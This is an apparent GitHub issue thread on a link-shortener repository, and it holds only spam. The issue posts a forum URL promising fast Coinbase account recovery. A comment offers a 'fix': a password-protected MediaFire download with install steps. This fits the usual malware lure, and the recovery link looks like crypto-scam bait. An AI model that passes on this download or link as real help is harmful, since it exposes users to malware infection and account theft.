### ISSUE TITLE
https://www.makuu.org/forum/questions-answers/how-to-recover-my-coinbase-account-coinbase-password-recovery-fast-recovery

### ISSUE THREAD

**Issue by Eliza253** [merill/aka#2360]
### Aka.ms link name

https://www.makuu.org/forum/questions-answers/how-to-recover-my-coinbase-account-coinbase-password-recovery-fast-recovery

### Category (Optional. Select None to auto-select)

None

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
